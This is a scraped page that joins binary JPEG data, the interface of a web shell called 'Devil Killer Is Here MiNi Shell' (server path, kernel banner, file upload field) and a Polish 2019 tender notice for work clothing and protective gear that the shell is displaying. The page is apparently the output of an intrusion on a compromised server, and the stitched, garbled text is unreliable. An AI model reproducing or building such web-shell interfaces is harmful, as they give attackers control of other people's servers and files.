JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190115/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190115/503513-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 503513-N-2019 z dnia 2019-01-15 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">"EKO DOLINA" Sp. z o.o.</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Sukcesywne dostawy odzieży, obuwia roboczego i ochronnego, rękawic roboczych i ochronnych, ochron indywidualnych</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">"EKO DOLINA" Sp. z o.o.</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">19168071300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Al. Parku Krajobrazowego 99, Łężyce</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu"></span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">84207 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Koleczkowo</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">pomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">586 725 000</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">ekodolina@ekodolina.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">586 727 474</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://ekodolina.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Podmiot prawa publicznego</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://ekodolina.pl/kategorie-przetargow/aktualne-przetargi/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://ekodolina.pl/kategorie-przetargow/aktualne-przetargi/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">w wersji pisemnej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">"EKO DOLINA" SP. Z O.O. ŁĘŻYCE, AL. PARKU KRAJOBRAZOWEGO 99 84-207 KOLECZKOWO</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Sukcesywne dostawy odzieży, obuwia roboczego i ochronnego, rękawic roboczych i ochronnych, ochron indywidualnych</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">OZP-P/05/2019/Odzież</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia są Sukcesywne dostawy odzieży , obuwia roboczego i ochronnego, rękawic roboczych i ochronnych, ochron indywidualnych (KOD CPV 18100000-0, 18130000-9, 18141000-9, 188300-6) w poniżej opisanym asortymencie:L.p.	Asortyment	Opis	Ilość1	Buty gumofilce	Wierzch i spód wykonane z modyfikowanego PVC w kolorze czarnym, ocieplane filcem. Podeszwa antypoślizgowa. Zgodnie z normą EN 20347:2012 Środki ochrony indywidualnej. Obuwie zawodowe.	5 par2	Buty gumowe robocze	Wykonane z modyfikowanego PCV, odpornego na działanie kwasów, zasad, benzyny i alkoholi. We wnętrzu podszewka wykonana z dzianiny poliestrowej. Podeszwa urzeźbiona wykonana z olejoodpornego PVC, odporna na przebicie i uderzenia. Absorpcja energii w części piętowej. Stalowy podnosek, zabezpiecza przed uderzeniami z energią do 200J i zgnieceniem o sile do 15 kN. Właściwości antyelektrostatyczne. Typ S5 - zgodność z normą EN 20345:2012 Środki ochrony indywidualnej. Obuwie bezpieczne.	5 par3	Ocieplacz do butów gumowych	Gramatura materiału: 155-165 g/m?. Wysokość: 40 cm.	8 par4	Czapka letnia z daszkiem	Kolor granat lub czarny, główka czapki uszyta z pięciu klinów, usztywniony daszek, regulowany obwód głowy, skład mieszanki 35-40% poliester/60-65% bawełna	31 szt.5	Czapka ciepła	Dzianina akrylowa 100%, wywijana, kolor czarny lub ciemny granat. Zgodność z normą EN ISO 13688:2013-12 Odzież ochronna. Wymagania ogólne.	59 szt.6	Hełm ochronny	Rok produkcji -2019 lub 2018. Hełm ochronny wykonany z tworzywa ABS. Więźba z poliamidu z regulacją, 6 punktów zamocowania. Potnik z gąbki. Wykonanie zgodnie z EN 397:1997 Przemysłowe hełmy ochronne	10 szt.7	Fartuch ochronny podgumowany wodoochronny	Fartuch przedni podgumowany 100% PCV z karczkiem, zakładany na szyję z wiązaniem na paski z tyłu. Od wewnętrznej strony flokowany. Kolor żółty, wymiar 75x110. Zgodność z normą EN 343:2003 Odzież ochronna. Ochrona przed deszczem.	100 szt.8	Narękawki wodoochronne	Wykonane z dzianiny poliestrowej powleczonej polichlorkiem winylu, obustronnie wykończone taśmą elastyczną, stanowiące uzupełnienie fartucha ochronnego. Od wewnątrz flokowane. Kolor żółty. Długość 60cm. Gramatura 340-360 g/m2 Zgodność z normą EN 343:2003 Odzież ochronna. Ochrona przed deszczem.	100 par9	Okulary ochronne zwykłe (nie na gumce)	Tradycyjne okulary ochronne z poliwęglanu, oprawki bezbarwne z wentylacją boczną bezpośrednią. Zgodność z normą PN-EN 166:2005 Ochrona indywidualna oczu. 38 szt.10	Gogle na gumce	Gogle z poliwęglanu, bezbarwne. Miękka oprawka z PVC. Wentylacja pośrednia. Opaska elastyczna dziana. Zgodność z normą EN:2005 166 Ochrona indywidualna oczu 5 szt.11	Gogle chemoodporne	Gogle chroniące przed rozpryskiem cieczy ("3" EN166) oraz dużymi cząsteczkami pyłu ("4"EN166), powłoka zabezpieczająca przed parowaniem (EN166 "N") oraz zarysowaniem z opaską regulowaną. Zgodność z normą EN 166:2005 Ochrona indywidualna oczu	3 szt.12	Kamizelka odblaskowa (kolor żółty)	Tkanina - poliester. Zapinanie na rzep. Odzież klasy 2. Kolor żółty. Naszyte certyfikowane podwójne srebrne taśmy odblaskowe. Zgodność z normą EN 471+A1:2008 Odzież ostrzegawcza o intensywnej widzialności.	29 szt.13	Kombinezon jednorazowy (kolor biały)	Kombinezon ochronny jednorazowy z kapturem. Posiada gumkę ściągającą wokół głowy, kostek oraz w talii. W nadgarstkach ściągacz. Kombinezon zapinany na zamek błyskawiczny umieszczony pod listwą. Zgodność z normami: EN13034:2010, EN13982-1:2008, EN1149-5, EN1073-2, EN14126:2005.	290 szt.14	Kombinezon jednorazowy (kolor biały)	Wymagania jak wyżej oraz dodatkowo ochrona przed ciekłymi środkami chemicznymi pod ciśnieniem TYP 3, zgodnie z normą EN14605+A1:2010 Odzież chroniąca przed ciekłymi chemikaliami	60 szt.15	Koszula flanelowa	Wykonane z flaneli 100% bawełna. Zgodność z normą EN ISO 13688:2013-12 Odzież ochronna. Wymagania ogólne.	247 szt.16	Koszulka T-SHIRT Bawełna 100% gramatura 170-180 g/m?, kolor granat, czarny lub niebieski. Zgodność z normą EN ISO 13688:2013-12 Odzież ochronna. Wymagania ogólne.	247 szt.17	Ubranie robocze typ szwedzki (bluza + spodnie ogrodniczki), oznaczone nazwiskiem i imieniem pracownika z podwójnymi taśmami odblaskowymi	Wymagania ogólne. Wykonane z tkaniny o składzie mieszanki 35-40% poliester/60-65% bawełna, o gramaturze 230-260 g/m?, wykurczonej - gotowej do prania w temperaturze prania 60°C w pralnicach bębnowych i suszenia w temperaturze 60° w suszarkach bębnowych, o dużej trwałości barwy. Kolor granat. Wymagane podwójne szwy i dodatkowe wzmocnienia w miejscach narażonych na rozerwania. Zgodność z normą EN ISO 13688:2013-12 Odzież ochronna. Wymagania ogólne.. Wymagania ogólne. Naszyte na rękawach i dole bluzy oraz nogawkach spodni certyfikowane podwójne srebrne taśmy odblaskowe (klasy II) przeznaczone do prania przemysłowego - minimum 30 cykli prania chemicznego. Zgodność z normą EN ISO 20471:2013-7 Odzież ostrzegawcza o intensywnej widzialności. Bluza fason szwedzki: zapinana na napy, dół bluzy zakończony na całym obwodzie listwą, po bokach wszyte ściągacze z gumy, rękaw zakończony mankietem zapinanym na nap. Spodnie ogrodniczki: regulowany obwód pasa poprzez wszyte po bokach ściągacze z gumy oraz regulacja szelek z wszytymi w tylnej części ściągaczami z gumy. Dwie kieszenie z przodu. Rozporek zapinany na guziki. Boki spodni zapinane na guziki.	260 kpl18	Ubranie robocze typ szwedzki bluza + spodnie ogrodniczki, oznaczone nazwiskiem i imieniem pracownika z podwójnymi taśmami odblaskowymi(odzież antyelektrostatyczna dla elektryków)	Wymagania ogólne. Wykonane z tkaniny spełniającej wymagania normy zharmonizowanej EN 1149-5 Odzież ochronna. Właściwości elektrostatyczne. Wymagania materiałowe i konstrukcyjne. Duża trwałość barwy i rozmiaru po wielu praniach. Kolor granat. Wymagane podwójne szwy i dodatkowe wzmocnienia w miejscach narażonych na rozerwania. Zgodność z normą EN ISO 13688:2013-12 Odzież ochronna. Wymagania ogólne. Naszyte na rękawach i dole bluzy oraz nogawkach spodni certyfikowane podwójne srebrne taśmy odblaskowe (klasy II) przeznaczone do prania przemysłowego - minimum 30 cykli prania chemicznego. Zgodność z normą EN ISO 20471:2013-7 Odzież ostrzegawcza o intensywnej widzialności. Bluza fason szwedzki: zapinana na napy, dół bluzy zakończony na całym obwodzie listwą, po bokach wszyte ściągacze z gumy, rękaw zakończony mankietem zapinanym na nap. Spodnie ogrodniczki: regulowany obwód pasa poprzez wszyte po bokach ściągacze z gumy oraz regulacja szelek z wszytymi w tylnej części ściągaczami z gumy. Dwie kieszenie z przodu. Rozporek zapinany na guziki. Boki spodni zapinane na guziki.	7 kpl19	Kurtka ciepła oznaczona nazwiskiem i imieniem pracownika z podwójnymi taśmami odblaskowymi	Kurtka z kapturem długość do połowy uda, zapinana na zamek błyskawiczny kryty plisą zapinaną na napy. Sznurek ściągający w pasie. W mankietach rękawów wszyte gumy ściągające. Kieszenie zewnętrzne wpuszczane. Kaptur przypinany na zamek błyskawiczny. Wykonana z tkaniny o składzie mieszanki 35-40% poliester/60-65% bawełna, gramaturze 230-260 g/m?, wykurczonej - gotowej do prania w temperaturze prania 60°C w pralnicach bębnowych i suszenia w temperaturze 60° w suszarkach bębnowych, o dużej trwałości barwy. Kolor granat. Ocieplina o gramaturze 150-160 g/m?. Zgodność z normą EN ISO 13688:2013-12 Odzież ochronna. Wymagania ogólne. oraz EN 342 Odzież ochronna. Zestawy i wyroby odzieżowe chroniące przed zimnem. Naszyte na rękawach i dole kurtki certyfikowane podwójne srebrne taśmy odblaskowe (klasy II) przeznaczone do prania przemysłowego - minimum 30 cykli prania chemicznego. Zgodność z normą EN ISO 20471:2013-7 Odzież ostrzegawcza o intensywnej widzialności.	43 szt.20	Ubranie ocieplane oznaczone nazwiskiem i imieniem pracownika z podwójnymi taśmami odblaskowymi	Zgodność z normą EN ISO 13688:2013-12 Odzież ochronna. Wymagania ogólne. Wymagania ogólne. Wykonane z tkaniny o składzie mieszanki 35-40% poliester/60-65% bawełna o gramaturze 230-260 g/m? wykurczonej - gotowej do prania w temperaturze prania 60°C w pralnicach bębnowych i suszenia w temperaturze 60° w suszarkach bębnowych, o dużej trwałości barwy. Kolor granat. Ocieplina o gramaturze 150-160 g/m?. Wymagane podwójne szwy i dodatkowe wzmocnienia w miejscach narażonych na rozerwania. Naszyte na rękawach i dole bluzy oraz nogawkach spodni certyfikowane podwójne srebrne taśmy odblaskowe (klasy II) przeznaczone do prania przemysłowego - minimum 30 cykli prania chemicznego. Zgodność z normą PN-EN ISO 20471:2013-7 Odzież ostrzegawcza o intensywnej widzialności.Kurtka z kapturem: długość do połowy uda, zapinana na zamek błyskawiczny kryty plisą zapinaną na napy. Sznurek ściągający w pasie. Kieszenie zewnętrzne wpuszczane. Gumy ściągające wszyte w mankiecie rękawa. Kaptur przypinany na zamek błyskawiczny. Spodnie ogrodniczki: regulowany obwód pasa poprzez wszyte po bokach ściągacze z gumy oraz regulacja szelek z wszytymi w tylnej części ściągaczami z gumy. Dwie kieszenie z przodu. Rozporek zapinany na guziki. Boki spodni zapinane na guziki.	25 kpl21	Ubranie ocieplane oznaczone nazwiskiem i imieniem pracownika z podwójnymi taśmami odblaskowymi (odzież antyelektrostatyczna dla elektryków)	Zgodność z normą EN ISO 13688:2013-12 Odzież ochronna. Wymagania ogólne. Wykonane z tkaniny spełniającej wymagania normy zharmonizowanej EN 1149-5 Odzież ochronna. Właściwości elektrostatyczne. Wymagania materiałowe i konstrukcyjne. Wymagania ogólne. Wykonane z tkaniny o składzie mieszanki 35-40% poliester/60-65% bawełna o gramaturze 230-260 g/m? wykurczonej - gotowej do prania w temperaturze prania 60°C w pralnicach bębnowych i suszenia w temperaturze 60° w suszarkach bębnowych, o dużej trwałości barwy. Kolor granat. Ocieplina o gramaturze 150-160 g/m?. Wymagane podwójne szwy i dodatkowe wzmocnienia w miejscach narażonych na rozerwania. Naszyte na rękawach i dole bluzy oraz nogawkach spodni certyfikowane podwójne srebrne taśmy odblaskowe (klasy II) przeznaczone do prania przemysłowego - minimum 30 cykli prania chemicznego. Zgodność z normą PN-EN 20471:2013-7 Odzież ostrzegawcza o intensywnej widzialności. Kurtka z kapturem: długość do połowy uda, zapinana na zamek błyskawiczny kryty plisą zapinaną na napy. Sznurek ściągający w pasie. Kieszenie zewnętrzne wpuszczane. Gumy ściągające wszyte w mankiecie rękawa. Kaptur przypinany na zamek błyskawiczny. Spodnie ogrodniczki: regulowany obwód pasa poprzez wszyte po bokach ściągacze z gumy oraz regulacja szelek z wszytymi w tylnej części ściągaczami z gumy. Dwie kieszenie z przodu. Rozporek zapinany na guziki. Boki spodni zapinane na guziki.	3 kpl22	Rękawice tzw. grip (rozmiar 10)	Wykonane z dzianiny, pięciopalczaste ze ściągaczem w okolicach nadgarstka, powlekane szorstkowatą gumą w kolorze żółtym. Odporne na ścieranie. Klasa I. Potoczna nazwa grip lub greiferki. Rozmiar 10. Zgodność z normą EN 420+A1:2010 Rękawice ochronne. Wymagania ogólne.	3536 par23	Rękawice ochronne gumowe flokowane (o poziomach skuteczności minimum 1000) rozmiar S, M, L, XL	Rękawice pięciopalczaste z naturalnej gumy lateksowej, część robocza chropowata, o znacznej elastyczności, odporne na rozciąganie, wysoka odporność na detergenty i środki piorące. Potoczna nazwa 